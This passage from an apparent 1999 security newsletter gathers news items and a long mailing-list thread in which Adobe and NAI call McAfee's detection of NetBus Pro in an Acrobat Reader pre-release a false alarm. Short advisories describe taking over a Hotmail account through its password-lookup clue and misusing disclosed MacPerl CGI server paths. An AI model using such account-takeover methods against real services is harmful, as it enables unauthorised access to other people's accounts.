      feature doesn't pose a super-huge risk. But Microsoft is looking at ways of
      modifying this feature in future releases." 
      
      @HWA
      
 06.0  High tech on the battlefield
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       From http://www.net-security.org/
       
       WITH HIGH TECH AGAINST CYBERWARS
       by BHZ, Friday 16th Apr 1999 on 3:15 pm CET
       A device known as the End User Terminal, or EUI, a mobile, wireless computer
       communication and tracking system, was one of several high-tech systems
       demonstrated Wednesday as troops staged a raid on a mock city of cinderblock
       buildings at Camp Pendleton, 40 miles north of San Diego. The EUT allows combat
       troops to pinpoint the location of friendly and enemy troops in the area. Then they can
       relay that information in real time back to commanders, who can then send in air
       strikes or reinforcements. Worn like a backpack, the EUT includes an ultra- small
       notebook computer, a power amplifier and global positioning system receiver. A
       designer for Litton PRC of McClean, Va., said the 12-pound pack costs about $5,500.
       Downsides on the system seem to be the fragileness of the system. Spectators
       wandered what would happen if the computer took a beating on the battlefield,
       became infected with chemical weapon residue or fell into enemy hands -- with
       precise data on troop locations. Contributed by Thejian.
 
       @HWA      

 07.0  Hotmail has similar vulnerabilty to last weeks rocketmail advisory
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       from: http://securityhole.8m.com/
       
       More Webmail Madness; Hotmail vulnerable - 18 April 1999
       
       We released our Rocketmail advisory about a week ago, and decided to do some more
       digging. This time we were able to get into an old Hotmail account of ours via the
       password lookup function.Once the clue was given, a random string of letters and 
       numbers, we typed in the clue as the answer. This proved sufficient enough to be 
       taken to the next level, where we entered a new password. Once again, the mail 
       which was in the account was missing, probably deleted automatically after x amount
       of days, but the original preferences, including name and location of the account 
       holder were still intact.
       
       We hope Hotmail will try to fix this hole, which was also found in Rocketmail. 
       We recommend removing password lookup functions on all webmail sites, and deleting
       accounts after 4 months of inactivity.

       MAO Enterprises ERT    
       
       @HWA
       
 08.0  MacPerl CGI vulnerability
       ~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Some MacPerl CGIs Reveal Server Pathnames - 10 April 1999

       This is evidently the fault of diagnostic output utilized by some Perl CGIs 
       served via MacPerl and a webserver. When a CGI with diagnostic output
       encounters an error, it prints (displays) the cause of the error in the script
       in addition to the pathname of the file. The CGI is usually in the cgi-bin 
       directory of the webserver, so this is not new. However, it gives the full 
       path to the script. If the path is Server HD:Web Apps:Serving:Webstar 3.0:
       cgi-bin:dumbscript.cgi, then that will be displayed for all to see. This poses 
       a problem. If a person with devious intent were to rename their own hard drive
       as Server HD and create a series of folders with the same names as the folders
       on the webserver's drives, and then make an alias of the end result, the alias
       can be uploaded to the webserver, and it will be fuctional because the paths are
       identical. A compressed alias uncompressed in a publically accessible area or in
       a trojan application could be devestating due to the personal and sensetive 
       information possibly contained within.
       
       We hope CGI developers will keep the paths to themselves from now on, and not 
       make it public information.
       
       MAO Enterprises ERT
       
       @HWA
       
 09.0  The Adobe Acrobat NetBus scare thread;
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date:Tue, 6 Apr 1999 07:41:06 -0600 
       Reply-To:"Wamsley, James R"  
       Sender:Windows NT BugTraq Mailing List  
       From:"Wamsley, James R"  
       Subject:Adobe put Trojan horse in Acrobat. 
       Comments:To: "firewall-wizards@nfr.com"  
       Comments:cc: "Samos, Randy B."  
       
       We recently found an alarming problem with Adobe's pre-release of Acrobat 4.0, 
       When one of our users downloaded and installed the pre-release, McAfee, using 
       data definitions 4.0.4017 stated that one file net bus pro.dr contained a virus 
       and could not be removed. Of course we investigated and see NetBus there. The 
       user opened a problem report with Adobe. They acknowledge that NetBus Pro is 
       part of the package, but 'have not been reported to cause problems with 
       anyone's computer at this time.' 
       
       I personally find this absolutely reprehensible that they would purposely put 
       'remote administration and spy software' in a package that will be widely 
       distributed around the world. That is all any of us need is the have a lot of 
       users install this, and the nefarious users obtain the whole package and start 
       whacking desktops whenever they choose. 
       
       Comments? 
       
       [ Jim Wamsley, Network Engineering 
       [ StorageTek 
       [ One StorageTek Drive, M.S. 4380, Louisville, CO 80028 
       [ Audible: (303) 673-8163 Logical jim_wamsley@stortek.com 
       [ Sed quis custodiet ipsos custodes - Juvenal, C. 100 C.E 
       
       ----------------------------------------------------------------------------------------
       
       Date:Wed, 7 Apr 1999 15:05:18 -0400 
       Reply-To:Russ  
       Sender:Windows NT BugTraq Mailing List  
       From:Russ  
       Subject:Re: Adobe put Trojan horse in Acrobat. 
       Comments:To: "Wamsley, James R"  
       
       Interim Update: 
       
       James is in a seminar today, and while I was able to drag him out of it long 
       enough to ask a few questions, some will remain unanswered until tomorrow 
       (when he can get to the source messages he has). 
       
       - They found NetBusPro.dr in a pre-released version of Adobe Acrobat Reader 4.0 
       - They reportedly got a response from Adobe indicating it had been put there, 
       and that "nobody has reported it to cause any problems". 
       
       When I spoke to Adobe Customer Service, they could not find any reference to 
       NetBus being included, officially, in any of their Acrobat released products. 
       
       Several posters have stated they do not find NetBus when scanning with McAfee 
       (various versions) against the released Adobe Acrobat 4.0 package (note, I 
       don't believe this is the same package James was referring to). 
       
       I received a message from one poster that included a snippet of a message he 
       received from a member of the anti-virus research community within which, was a 
       supposed response from McAfee. McAfee was supposedly acknowledging that this 
       was a false detection within their 4.0.4017 .DAT file. The response said that 
       this would be fixed "in a future update of the .DAT files). 
       
       I downloaded and checked the McAfee 4.0.4019 .DAT file WhatsNew.txt file, but it 
       makes no mention of any false detection, or whether or not its been corrected. 
       James has not scanned it with 4.0.4019 so cannot say if it has, in fact, 
       disappeared or not. 
       
       My apologies for how long this response has taken. James' message caused a 
       flood of responses and I had hoped to get him to give us some more facts. It 
       took me a while to track down his pager number (ain't social engineering fun!), 
       hence the delay. 
       
       I have messages into the senior researchers at NAI, but as yet they haven't 
       responded either. Without accurate info about precisely where James got 
       precisely what, its hard to ask Adobe many more questions than I already have. 
       I truly goofed in sending this one out without a little more clarification in 
       advanced...tsk, tsk... 
       
       More when something useful arises. 
       
       Cheers, Russ - NTBugtraq moderator 
       
       ----------------------------------------------------------------------------------------
       
       Date:Thu, 8 Apr 1999 21:33:18 -0400 
       Reply-To:Russ  
       Sender:Windows NT BugTraq Mailing List  
       From:Russ  
       Subject:Re: Adobe put Trojan horse in Acrobat. 
       
       Well, I guess neither NAI nor Adobe think enough of us to warrant us with their 
       direct response, so instead, you get me...;-] 
       
       Last night, I spoke with Vincent Gullotto, Manager of AV Researchers at AVERT, 
       the Supreme Beings of NAI's Anti-Virus crowd. I had sent him a message early 
       yesterday about the Adobe issue and wanted his confirmation after I had 
       received a redirected note originating from DataFellows quoting confirmation 
       from McAfee that the detection of NetBusPro in the pre-release of Adobe Reader 
       4.0 was, in fact, a mis-detection. 
       
       Well, Vincent was nice enough to confirm to me that it was, in fact, a 
       mis-detection. He agreed that his group would confirm this to NTBugtraq, but he 
       needed some confirmation from his researchers regarding precisely which versions 
       of their .DAT files were mis-detecting. "Tomorrow", he said. 
       
       I figured that many of you would not accept a simple explanation from Adobe, or a 
       3rd party confirmation from DataFellows. I spoke to, indirectly, PR people at 
       Adobe.Seems Adobe is going to publish something on Saturday (gee, thanks for 
       being so quick Frank). I figured, well, this wasn't going to convince you either. 
       
       I stressed to Vincent the need to have NAI confirm the mis-detection. Gee, he 
       agreed, but here we are and still no confirmation. 
       
       Now I've never been one to hide my disdain for the way NAI handles important 
       issues, but I figured after a person-to-person conversation that I took the 
       trouble to initiate, and after him telling me point blank that we'd see 
       something today...sigh...oh well, guess I had higher expectations than I should 
       have. 
       
       So, take my word for it, both NAI and Adobe say the detection of NetBusPro in 
       the pre-release of Adobe Reader 4.0 was a mis-detection. 
       
       That said, Adobe did confirm that there was a file in that version called 
       NetBusPro.dr. Now ask yourself, who would be stupid enough to call a file in, 
       even, a pre-release package such a significantly suspicious name as NetBus? 
       Adobe and NAI both seem suspiciously silent about this fact. Did NAI detect 
       something and Adobe convinced them to call it a mis-detection? Did Adobe 
       incorporate NetBusPro into their product and sufficiently hide it, maybe with 
       NAI cooperation, such that detection programs don't see it anymore? 
       
       I have a copy of a message from service@adobe.com which states that 
       NetBusPro.dr is, in fact, included in the pre-release. That same message 
       includes links to the NetBus home page, as if to say, "if you want to know 
       what this thing does, the thing we included in this package, go here and 
       you'll find out". Another message I have from Adobe internal says that 
       they've been seeing this rumor for a week now, and on lists where they don't 
       have dedicated lurkers to dispel such rumors, its run rampant. 
       
       If you don't know me, let me tell you. I'm pretty good at getting to the 
       bottom of things with any company. The fact that Adobe is so unconcerned 
       about this "rumor" that they're not publishing anything to dispel it until 
       Saturday stinks of other issues to me. The fact that NAI, despite a personal 
       confirmation and agreement to publish a statement, still have not, also 
       stinks of other issues to me. 
       
       In the spirit of "better safe than sorry", I'd say this. Stay away from Adobe 
       Acrobat Reader 4.0 and NAI scanners until this thing has been clarified beyond 
       a shadow of a doubt (and if you ask me, I don't know how that is now possible). 
       
       Draw your own conclusions. DateFellows had a page up about NetBus earlier today, 
       which I saw, at http://www.europe.datafellows.com/v-descs/netbus.htm, which now 
       seems to be unavailable. I had personal messages from folks at DataFellows 
       confirming it was a mis-detection, but they weren't prepared to state this on 
       the list. 
       
       As a responsible White Hat I wanted to get NAI to confirm it was a mis-detection, 
       and put the whole issue to rest. But as a responsible journalist, I figure the 
       above is the best you can expect, at least for now. 
       
       A fine line, I know, but if you'd been told what I've been told, I suspect you'd 
       be thinking like me. 
       
       Cheers, Russ - NTBugtraq moderator 
       
       ----------------------------------------------------------------------------------------
       
       Date: Thu, 8 Apr 1999 19:08:42 -0700
       From: Sarah Rosenbaum 
       To: BUGTRAQ@netspace.org
       Subject: ALERT: No viruses in Acrobat Reader
       
       The public beta release of Acrobat Reader 4.0, posted on www.adobe.com in
       early March was rumored to contain a virus. This is a false report.
       
       McAfee VirusScan 4.x.x for Windows using the 4.0.4017 Virus DAT file
       released March 15, 1999 reported that the pre-release version had the
       NetBusPro.dr virus, but this was due to an imprecise virus specification
       within the 4.0.4017 Virus DAT file itself.
       
       The 4.0.4019 Virus DAT file released by Network Associates on March 29,
       1999 corrects the problem and shows that the file is free of viruses.Both
       the virus lab at Network Associates and Adobe Systems Inc have confirmed
       this fix.
       
       BTW, the 4.0.4015 Virus DAT file that was current as of early March had
       also shown the file to be free of viruses.
       
       All pre-release and release versions of Acrobat 4.0 Reader are free of
       known viruses.Adobe uses a number of virus scanning utilities, in
       addition to McAfee, to thoroughly screen all software before it is released
       publicly.Thank you for your attention in this matter.
       
       Sarah
       -------------------------------------------------------------------------
       Sarah Rosenbaum Adobe Systems Incorporated
       Group Product Manager 345 Park Avenue, MS E14
       Adobe Acrobat San Jose, CA95110
       408-536-3844 (v)srosenba@adobe.com
       408-537-4005 (f)www.adobe.com/acrobat
       ------------------------------------------------------------------------
       
       ----------------------------------------------------------------------------------------
       
       Date: Fri, 9 Apr 1999 11:27:16 -0400
       From: Russ 
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: FW: A post on you NT Bugtrack
       
       Here's the message I received from NAI last night, shortly after my
       message went out to the list. Unfortunately it was sent directly to me
       rather than to the list itself.
       
       Cheers,
       Russ - NTBugtraq moderator
       
       -----Original Message-----
       >From: Gullotto, Vincent [mailto:Vincent_Gullotto@NAI.com]
       Sent: Thursday, April 08, 1999 10:16 PM
       To: 'Russ'
       Subject: A post on you NT Bugtrack
       
       
       As we spoke about yesteday and I did confirm and agree to provide you
       and
       your readers a response here is a statement from AVERT, A Division of
       NAI
       Labs.
       
       The topic discussed in the NT BugTrack Subject:"Adobe put Trojan horse
       in
       Acrobat" was initially brought to our attention on 3/19/99.The
       detection
       of the NetBusPro tool in the ar40.exe file was incorrect.This occurs
       with
       the 4017 and 4018 DAT sets for McAfee and Dr Solomon VirusScan 4.XX
       products, which were posted on March 17th and March 24th to the AVERT
       Labs
       web page. The correction was made to the 4019 DAT set which were
       posted on
       March 29 on NAI's FTP site.
       
        Vincent Gullotto
       Manager, AV Research
       AVERT-NAI Labs
       www.avertlabs.com 
       
       ----------------------------------------------------------------------------------------
       
       Date: Fri, 9 Apr 1999 14:19:34 -0400
       From: Russ 
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: Adobe put Trojan horse in Acrobat.
       
       I've just put an editorial on the Adobe issue up on the NTBugtraq site,
       it includes the source information I received that has led me to make
       some of the statements I have. Many people asked me to disclose more of
       what I had in support of my comments.
       
       Check out the revised News bulletin on the NTBugtraq Home Page,
       http://ntbugtraq.ntadvice.com, titled "NetBusPro in Adobe? You decide!".
       
       Cheers,
       Russ - NTBugtraq moderator
       
       ----------
       
       [http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28]
       
       What's up with Adobe? 
       Written by Russ Cooper - 4/9/99 12:42:42 PM
       
       Preface:
       Due to over-whelming response, this page is an attempt to disclose what information I have received regarding this issue. While some of the information is verbatim
       copy I've received from others, I should make it clear that I have altered some information in order to protect sources. I hope that my reputation as a responsible and
       reliable source of accurate information is not tainted by this fact.
       
       In addition, this page also contains speculative observation and editorial commentary. I personally have not been able to investigate the true purpose of any component
       within the Adobe Acrobat Reader pre-release 4.0. I do not intend to, I leave that task to others who are more capable in this regard. I would appreciate hearing any
       findings, email me at russ.cooper@rc.on.ca.
       
       I hope this allows you to draw your own conclusions. I hope this will also encourage both Adobe and Network Associates, Inc. to better communicate with its user
       community over issues as sensitive as this one is.
       
       History:
       
       The alarm raised by Jim Wamsley of StorageTek  over the possible presence of NetBusPro within the Adobe Acrobat Reader pre-release 4.0  was, I thought, of import to
       NT Security-minded folks everywhere. McAfee's anti-virus definition file (.DAT file) version 4.0.4017 told him that it believed NetBusPro might be included in the
       AR40.EXE file (extracted from the downloaded AR40.zip file from Adobe's FTP site) .
       
       James had received this warning from one of his users and, correctly IMO, alerted NTBugtraq.
       
       James' user went to Adobe's Tech Support web site and submitted a question to them. A response was ultimately sent to that user from a generic Adobe Service
       account (service@adobe.com). The edited response follows (it has been edited because it contained not only the user name and email address, but also IP address
       information of the user. The Adobe "Thread Number", a tracking number they use, has also been omitted. Anyone from Adobe who would like this number is welcome to
       contact me for it);
       
       
       -----Original Message-----
       From: service@Adobe.COM [mailto:service@Adobe.COM]
       Sent: Friday, April 02, 1999 10:34 AM
       To: xxxxxxx@stortek.com
       Subject: 
       
       Hello xxx,
       
       Thank you for taking the time to alert us of the presence of a possible virus in the Acrobat Reader 4.0 Pre-release download.
       
       Although we have received reports of this virus from a number of different sources, our engineers have not found the presence of an actual virus in the
       posted file. NetBus Pro is the name of a software application from another company, and we suspect that the NetBusPro.dr file within the Acrobat Reader
       4.0 Pre-release is being mistakenly reported as a virus (although this has not yet been confirmed).
       
       We do know for certain that the Acrobat Reader 4.0 Pre-release (Ar40.exe) has not been reported to cause problems with anyone's computer at this time.
       
       To obtain a version of the Acrobat Reader 4.0 Pre-release that has been verified not to produce any virus messages with McAfee, please download it from
       the following ftp site:
       
       ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip
       
       For more information on NetBus Pro, please visit the following website: http://NetBus.Org/main.html
       
       Also, visit the following URL on the Adobe Web site for the latest customer service and technical information:
       http://www.adobe.com/supportservice/custsupport/main.html
       
       Thank you for contacting Adobe Customer Support via the Adobe Web site.
       
       Best regards,
       Adobe Customer Support
       
       THREAD:xxxxxxxxxxxxxxxxxxxxx
       The thread number (above) is your reference number for this issue. Thank you for visiting www.adobe.com. We hope this reply answers your question.
       Inquiries such as yours often prompt us to update or add information to www.adobe.com so it can be available to other customers. Please return to
       www.adobe.com for additional information and inquiries. Copyright 1999 Adobe Systems Incorporated
       --- On 03/16/99, you wrote ---
       WebSite: Adobe.com
       ProblemType: Other
       WebURL: http://www.adobe.com/
       CONTENT_LENGTH = 741
       CONTENT_TYPE = application/x-www-form-urlencoded
       GATEWAY_INTERFACE = CGI/1.1
       HTTPS = OFF
       HTTP_ACCEPT = application/vnd.ms-excel, application/msword,application/vnd.ms-powerpoint, image/gif, image/x-xbitmap, image/jpeg,image/pjpeg, */*
       HTTP_ACCEPT_ENCODING = gzip, deflate
       HTTP_ACCEPT_LANGUAGE = en-us
       HTTP_COOKIE = AWID_9.80.22.140:10745:918855192:81;WECCIDCookie932364811728316
       HTTP_FORWARDED = by http://xxxxxx.xxxxxxx.xxx:80 (Netscape-Proxy/3.5)
       HTTP_HOST = cgi1.adobe.com
       HTTP_PRAGMA = no-cache
       HTTP_REFERER = http://www.adobe.com/misc/webform.html
       HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0b2; Windows NT)
       PATH = /usr/sbin:/usr/bin
       REMOTE_ADDR = xxx.xxx.xxx.xxx
       REMOTE_HOST = xxx.xxx.xxx.xxx
       REQUEST_METHOD = POST
       SCRIPT_NAME = /misc/comments04.cgi
       SERVER_NAME = cgi1.adobe.com
       SERVER_PORT = 80
       SERVER_PROTOCOL = HTTP/1.0
       SERVER_SOFTWARE = Netscape-Commerce/1.12
       SERVER_URL = http://cgi1.adobe.com
       TZ = US/Pacific
       The virus scan program I'm using (McAfee) says there is a virus in the AR40.exe file that is part of the Adobe Acrobat .zip file I just downloaded. VirusScan
       says it is a "NetBusPro" virus and can't remove it. My company's team responsible for virus things say it is a new version of NetBus, which is a Trojan
       Horse virus. Please contact me about this. --- original message ends ---
       
       
       Now as you can see, this certainly comes across as Adobe confirming the presence of a file called NetBusPro.dr. I have installed the same version that this person was
       referring to and cannot find a file anywhere on my system called NetBusPro.dr, however this does not mean its not present as the Adobe Server Rep. states.
       
       Its also worth pointing out that Adobe does not state, even in their public announcement  on the issue posted to Bugtraq, that the program in question does not have
       NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal statement that NetBusPro is not
       present would seem to have been the right thing to do.
       
       In the copy of the Adobe Internal Engineering document referencing this supposed false detection, a paragraph is present which is not present in the public Adobe
       statement; 
       
       
       "NetBus Pro 2.0 by Carl-Fredrik Neikter is a remote administration and spy tool. It enables you to remotely administer computers. Earlier versions of
       NetBus were used illicitly by people who create viruses to play tricks on other people by enabling them to remotely control their computers. These viruses
       involving NetBus were known as NETBUS.153 and NETBUS.160. NetBus Pro 2.0 is more robust than earlier versions known as NetBus, and NetBus Pro 2.0
       is significantly more difficult to distribute as a virus."
       
       
       Again, they seem more than willing to give praise to the NetBusPro product and make an attempt to differentiate its characteristic as a "virus" from earlier versions.
       
       Shortly after I sent James' message through to NTBugtraq I sent messages to 4 individuals at Network Associates, Inc.'s AVERT Labs , including Vincent Gullotto,
       Manager of AV Researchers (sent on 4/7/99 1:51pm EDT). Vincent had previously offered these contacts for virus-related issues. My message said;
       
       
       I released information this morning regarding the supposed inclusion of NetBus in Adobe Acrobat 4.0 based on McAfee 4.0.4017 identifying it being present
       in AR40.EXE.
       
       I've subsequently received a message stating that this was a mis-detection by your virus scanner. The poster included text supposedly originating from
       McAfee, but I have been unable to find it on your web site. The text was;
       
       -----------------------
       This file AR40.EXE for Adobe Acrobat Reader 4.0 is identified by .DAT 4017 as containing "NetBusPro.dr" trojan:
       
       Scanning file D:\!VIRUS\ar40.exe
       D:\!VIRUS\ar40.exe could have NetBusPro.dr trojan !!!
       
       This is a false detection. This will be corrected in a future update of the .DAT files. Also thank you for the sample referred to as XXXXXX. It has been
       forwarded to our researchers for examination and a researcher will get back to you with our findings. -----------------------
       
       Could you please confirm this, and if possible, provide a link to a publicly accessible statement from McAfee on this? Alternatively, could you have
       someone respond directly to NTBugtraq@listserv.ntbugtraq.com re-stating the above.
       
       Your quick reply would be greatly appreciated. I would also greatly appreciate a direct phone number for any of you.
       
       Cheers,
       Russ - NTBugtraq moderator 
       
       
       The included quote originated from a respected AV Researcher with DataFellows, and seems to have been sent to a number of people (despite this, I won't disclose the
       sources). Virtually the same wording ended up on DataFellows Web Site  late yesterday (btw, they have told me it was unavailable when I went to look at it yesterday
       simply due to the volume of hits it was receiving).
       
       At ~5:30pm EDT on 4/7/99 I called Vincent directly and spoke with him and one of his researchers about the issue. I stressed that we (NTBugtraq) needed a
       confirmation message from NAI to clarify the issue. I asked about NAI's policy regarding mis-detections and was told they do not make the information public. Not that
       they don't want to, only that they hadn't yet gotten around to placing the information somewhere on their web sites. Of course I pointed out that it could be included
       in their WhatsNew.txt file included in each .DAT file update, and he said he would consider what could be done.
       
       Meanwhile, it was agreed that NAI would post something to the list, as a direct response to my message to the list, that clarified what had happened. Vincent indicated
       that he needed to talk to an AV Researcher in the U.K. to determine precisely which .DAT file versions caused a mis-detection. Since it was already after U.K. closing,
       NTBugtraq could expect a message the following day (4/8/99). I certainly appreciated his thoroughness, and more than appreciated his cooperation in discussing the
       issues with me personally.
       
       Its probably reasonable to point out here that I stressed to Vincent my understanding of how mis-detections happen. I have no expectation that mis-detections will
       not occur, of course I hope they will be few and far between like he does, but they're bound to happen. I fully support any AV vendor who's product happens to
       mis-detect a virus, better safe than sorry. I pointed out, however, that its just as important to make disclosure of mis-detections. A number of messages I received in
       response to the original issue pointed out to me the harm they had been subjected to by people claiming they were being sent infected documents or files...claims made
       due to mis-detections. Its one thing for me to tell you that something is a mis-detection, but I would hope you'd only believe it if the AV vendor said so.
       
       After waiting until 9:30 EST on 4/8/99, after closing for the U.S., for a message from NAI clarifying the issue, I felt I should post something . The volume of messages I
       was receiving on the issue indicated that many people felt it was an important issue. 
       
       By this time I had spent a great deal of time thinking about the various aspects of this whole affair. Adobe seemed to be pointing people to NetBus, and seemed
       unwilling to outright state it was not in their product. NAI had promised a message to the list, but none materialized.
       
       I started to ask myself just how the mis-detection worked, and more importantly, how it could be corrected! Was VirusScan simply detecting the word "NetBusPro"
       somewhere in the file? According to my discussions with NAI, the mis-detection came from the reader containing "an icon that was very similar to one found in
       NetBusPro" as well as "some header material that was very similar". So did Adobe change an icon in the final release to stop the mis-detection? Or did NAI say to its
       .DAT file "if you see something that looks like NetBusPro in Adobe Acrobat Reader 4.0, ignore it, its not NetBusPro!"??
       
       No doubt AV Researchers can better explain why mis-detections happen, and how application vendors can make software that causes mis-detections, but both
       parties lackadaisical attitude to the issue just left me feeling like something was missing.
       
       I thought it reasonable that maybe Adobe included NetBusPro in the pre-release of their Reader in order to assist them during the beta testing phase. Might make
       sense, and they may have satisfied themselves that NetBusPro was the right product to assist them. Of course there should have been mention of this in the docs
       somewhere, and they should have acknowledged it in their announcement to the public. But I wouldn't expect NAI to remove detection of it, regardless of why it might
       be there.
       
       Did the NetBusPro folks get on NAI's back and tell them to stop detecting their now commercial version of the product as a Trojan?? If I were the owners of
       NetBusPro, and I was trying to sell it commercially, I certainly wouldn't be pleased that AV vendors were telling my users its a Trojan and shouldn't be trusted, would
       you?
       
       Or is it all just a simple issue of VirusScan simply being a bit too broad in its signature matching routines and picking up something completely unrelated to NetBusPro
       and thinking it was NetBusPro? This is probably the case, but I ask myself, how will I ever know??
       
       I'm not a conspiracy theorist like some of my on-line friends...(Hi Bill...;-])...but clearly there needs to be a more effective mechanism of handling these issues that is
       convincing enough to quell any suggestion of suspicious behavior. Unfortunately, I don't have an answer for that right now, hence my skepticism.
       
       Hopefully one of you with the ability to decompile and analyze code will be able to tell us, for certain, whether or not there is any NetBusPro functionality in the Adobe
       Acrobat Reader pre-release 4.0. Hopefully Adobe will make an unequivocal statement that there is not such functionality in any version of their product. Hopefully NAI,
       and all AV vendors, will start making lists of mis-detections available to the public as and when they happen.
       
       Hopefully I haven't over-hyped this issue, and instead, have helped somewhat to make such issues less worrisome in the future. That was my intent.
       
       Cheers,
       Russ - NTBugtraq moderator
       comments welcome... 
       
       ----------------------------------------------------------------------------------------
       
       Date: Mon, 12 Apr 1999 08:04:20 -0400
       From: Russ 
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: FW: ALERT: No viruses in Acrobat Reader
       
       [ The following text is in the "iso-8859-1" character set. ]
       [ Your display is set for the "US-ASCII" character set.]
       [ Some characters may be displayed incorrectly. ]
       
       Received: from smtp-relay-1.adobe.com ([192.150.11.1]) by
       ns.ntbugtraq.com with SMTP (Microsoft Exchange Internet Mail Service
       Version 5.5.1960.3)
       | id H1GPKN43; Sun, 11 Apr 1999 23:02:50 -0400
       Received: from inner-relay-1.Adobe.COM ([153.32.1.51] (may be forged))
       | by smtp-relay-1.Adobe.COM (8.8.6) with ESMTP id TAA23125
       | for ; Sun, 11 Apr 1999 19:57:16 -0700 (PDT)
       Received: from mail-321.corp.Adobe.COM|by inner-relay-1.Adobe.COM
       (8.8.5) with ESMTP id UAA15768; Sun, 11 Apr 1999 20:02:44 -0700 (PDT)
       Received: from sarahtp600|by mail-321.corp.Adobe.COM (8.7.5) with SMTP
       id UAA08101; Sun, 11 Apr 1999 20:02:41 -0700 (PDT)
       Message-Id: 
       X-Sender: srosenba@mail-321.corp.adobe.com
       X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
       Date: Sun, 11 Apr 1999 19:55:55 -0700
       To: Russ 
       >From: Sarah Rosenbaum 
       Subject: RE: ALERT: No viruses in Acrobat Reader
       In-Reply-To: 
       Mime-Version: 1.0
       
       -----Original Message-----
       >From: Sarah Rosenbaum [mailto:srosenba@Adobe.COM]
       Sent: Sunday, April 11, 1999 10:56 PM
       To: Russ
       Subject: RE: ALERT: No viruses in Acrobat Reader
       
       
       Dear Mr. Cooper,
       
       Below is an additional statement regarding the false reports that the
       Adobe Acrobat Reader pre-relese contained a "virus," or more
       specifically, the NetBusPro software. Although we believe the original
       statements from Adobe Systems Incorporated and Network Associates, Inc.
       last Thursday (April 8) clearly refuted the false report, your
       commentary on this issue on www.ntbugtraq.com suggests that you did not
       find such statements unequivocal.
       
       We appreciate the service your web site provides to the software
       industry. However, given the rapidity with which false informaiton can
       spread over the internet, we would appreciate that great care be taken
       to verify information that can so seiruosly harm a developer of top
       quality software. As you know, Adobe products are highly regarded. False
       reports such as these are damaging and also require a use of Adobe's
       resources which are better spent contributing to innovation.
       
       Thank you for posting the information below to your web site. For
       further information, please don't hestitate to contact me.
       
       Regards,
       Sarah
       ------------------------------------------------------------------------
       -
       Sarah Rosenbaum | | | | | | |Adobe Systems Incorporated
       Group Product Manager| || | | | | | |345 Park Avenue, MS E14
       Adobe Acrobat| || | | | | | || | | | | | |San Jose, CA|95110
       408-536-3844 (v)| | | | | | || | | | | | || | | | | | |srosenba@adobe.com
       408-537-4005 (f)| | | | | | || | | | | | || | | | | | |www.adobe.com/acrobat
       ------------------------------------------------------------------------
       
       Subject: NO NetBusPro IN ADOBE ACROBAT READER
       
       Adobe software, such as Acrobat Reader, does not include, nor did it
       ever include, any NetBus or NetBusPro software.
       
       McAfee VirusScan 4.x falsely reported the NetBusPro.dr software when
       scanning Ar40.exe and Ar40eng.exe pre-release software when using virus
       definitions 4.0.4017. The virus alert was caused by an error in version
       4.0.4017 of the virus definition file distributed Network Associates,
       Inc. This has been confirmed by the virus lab at Network Associates,
       Inc. and by Adobe Systems Incorporated.When you install virus
       definitions 4.0.4019, VirusScan 4.x does not report an eror with
       Ar40.exe or Ar40eng.exe.
       
       Adobe uses a variety of anti-virus software in addition to McAfee
       VirusScan to thoroughly screen all software before it is publicly
       released.
       
       There was some confusion from original reports because NetBusPro is
       described as both a virus and a "trojan horse". It is a common confusion
       because software such as NetBusPro is sometimes picked up by virus
       detection software.
       
       Regards,
       Sarah Rosenbaum
       ------------------------------------------------------------------------
       -
       Sarah Rosenbaum | | | | | | |Adobe Systems Incorporated
       Group Product Manager| || | | | | | |345 Park Avenue, MS E14
       Adobe Acrobat| || | | | | | || | | | | | |San Jose, CA|95110
       408-536-3844 (v)| | | | | | || | | | | | || | | | | | |srosenba@adobe.com
       408-537-4005 (f)| | | | | | || | | | | | || | | | | | |www.adobe.com/acrobat
       ------------------------------------------------------------------------
       
       
       At 01:28 PM 4/10/99 -0400, you wrote:
       >Could you get Adobe to confirm, publicly, that Adobe Acrobat Reader
       4.0,
       >any version be it beta or otherwise, never has, and does not, contain
       >components, or the complete version, of NetBusPro 2.x?
       >
       >NetBus v1.xx is considered a "virus", or a Trojan actually, but the
       >commercial product NetBusPro 2.x is not considered as such.
       >
       >Adobe's public statement, sent in your name, does not make this
       >distinction sufficiently for many of my 24,000+ subscribers (or me).
       >
       >Such a clarification, in public, either on your web site or via email,
       >would put this matter to rest once and for all.
       >
       >Cheers,
       >Russ - NTBugtraq moderator
       >List address: NTBugtraq@listserv.ntbugtraq.com
       >Web site: http://ntbugtraq.ntadvice.com
       >
       
       -------------------------------------------------------------------------------
       
       Adobe Conclusion - Part 1 
       Written by Russ Cooper - 4/13/99 5:38:47 PM
       
       I spoke with a wonderful PR fella at Adobe named Tim Oey this afternoon. I've been travelling since Sunday morning so this is why you haven't seen much from me
       lately. Anyway, so Tim's all anxious for me to get a change up on my web site regarding the latest breaking news from them (meaning I should change my site to
       reflect information Sarah sent me in private on Sunday which I published yesterday). I got a chuckle out of the fact he figured I should've changed my site overnight
       when its taken them more than 2 weeks to get something up on theirs...but that's another story.
       
       To the heart of the matter;
       
       In my editorial, http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28 (which I will be referring to as "my Adobe editorial" from now on), I said;
       
       "Its also worth pointing out that Adobe does not state, even in their public announcement on the issue posted to Bugtraq, that the program in question
       does not have NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal
       statement that NetBusPro is not present would seem to have been the right thing to do."
       
       to wit, Tim sent me this URL today;
       
       http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm
       
       within which, they state, unequivocally (as I hoped they would);
       
       "Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro software."
